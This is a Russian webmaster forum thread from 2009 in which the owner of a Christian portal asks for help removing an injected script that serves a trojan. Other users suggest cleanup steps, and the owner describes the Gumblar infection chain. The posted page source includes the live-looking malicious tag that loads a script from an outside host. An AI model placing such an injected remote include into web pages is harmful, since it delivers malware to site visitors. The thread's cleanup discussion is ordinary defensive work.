schtefan 0 Опубликовано: 19 декабря 2009 Рассказать Опубликовано: 19 декабря 2009 (изменено) Когда я делаю в браузере"исходный код страницы" то появляется интересный код <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /> <title>Христианский портал</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <meta name="description" content="Христианский портал" /> <meta name="keywords" content="Новый завет, христианский портал, каналы Online, проповеди, видео, музыка, апокрифы, афоризмы, христианские новости, новый завет Березники, для молодежи, пророчества, свидетельства." /> <meta name="generator" content="DataLife Engine (http://dle-news.ru)" /> <meta name="robots" content="all" /> <meta name="revisit-after" content="1 days" /> <link rel="search" type="application/opensearchdescription+xml" href="http://novy-zavet.ru/engine/opensearch.php" title="Христианский портал" /><link rel="alternate" type="application/rss+xml" title="Христианский портал" href="http://novy-zavet.ru/rss.xml" /> <link rel="alternate" type="application/rss+xml" href="/rss.xml" /> <meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /> <link rel="stylesheet" href="/templates/medizvestie/css/engine.css" type="text/css" /> <link rel="stylesheet" href="/templates/medizvestie/css/style.css" type="text/css" /> <!--[if IE]><link rel="stylesheet" type="text/css" href="/templates/medizvestie/css/ie.css" media="all"/><![endif]--> </head>[b]<script src=http://liverpoolgoldenestates.co.uk/css/12031.php ></script>[/b] Он выделен в самом низу <script src=http://liverpoolgoldenestates.co.uk/css/12031.php ></script>. Весь шаблон перерыл не могу понять где он прописан. из-за него меня банит Google так как при переходе по ссылке сразу идет загрузка трояна! Изменено 19 декабря 2009 пользователем schtefan Цитата Ссылка на сообщение Поделиться на других сайтах
maks1192 96 Опубликовано: 19 декабря 2009 Рассказать Опубликовано: 19 декабря 2009 Нужно удалить. Это вредностный код. Могу помочь почистить, в Понедельник... Если что - обращался... Цитата Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Весь шаблон перерыл не могу понять где он прописан. В index.php смотрели ? Цитата Ссылка на сообщение Поделиться на других сайтах
schtefan 0 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Автор В index.php смотрели ? Что я только не смотрел, все папки-все файлы перерыл. Я дусаю это инфекция, которую называют Gumblar. Проникает на сайты с помощью сворованных с компьютера вебмастера паролей FTP (ворует троян). Далее на сайте с различных каталогах размещаются backdoor PHP скрипты (часто в каталогах с файлами картинок). Так же backdoor код размещается в некоторых существующих .php файлах. После чего в веб страницы и .js файлы вставляются скрипты, на которые было указано выше. Ещё бывает, загружают на сайт в один из подкаталогов эксплойты и вставляют на них ссылки с других сайтов( у меня с liverpoolgoldenestates) Цитата Ссылка на сообщение Поделиться на других сайтах
МASTER 11 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Откройте notepad++ и сделайте поиск по файлам - "12031.php" Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 schtefan, после потери FTP доступа ваш сайт является скомпрометированным, мог быть добавлен не только этот код, но и модифициарованы PHP файлы которые могут делать теперь что угодно, например ворововать пароли ваших пользователей. И все файлы находящиеся на сервере после этого автоматически становяться небезопасными, т.к. могут быть и невидимые на странице коды. В данном случае нужно не искать что либо в PHP файлах, а перезаливать файлы скрипта на оригинальные из оригинального архива дистрибутива. Цитата Ссылка на сообщение Поделиться на других сайтах
schtefan 0 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Автор schtefan, после потери FTP доступа ваш сайт является скомпрометированным, мог быть добавлен не только этот код, но и модифициарованы PHP файлы которые могут делать теперь что угодно, например ворововать пароли ваших пользователей. И все файлы находящиеся на сервере после этого автоматически становяться небезопасными, т.к. могут быть и невидимые на странице коды. В данном случае нужно не искать что либо в PHP файлах, а перезаливать файлы скрипта на оригинальные из оригинального архива дистрибутива. У меня и так оригинальный дистрибутив, кроме папки с шаблонами Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 schtefan, Вы перезалили его после появления этого кода? Цитата Ссылка на сообщение Поделиться на других сайтах
schtefan 0 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Автор schtefan, Вы перезалили его после появления этого кода? да Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Тогда смотрите шаблоны и рекламу, скорее всего это стоит в main.tpl Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.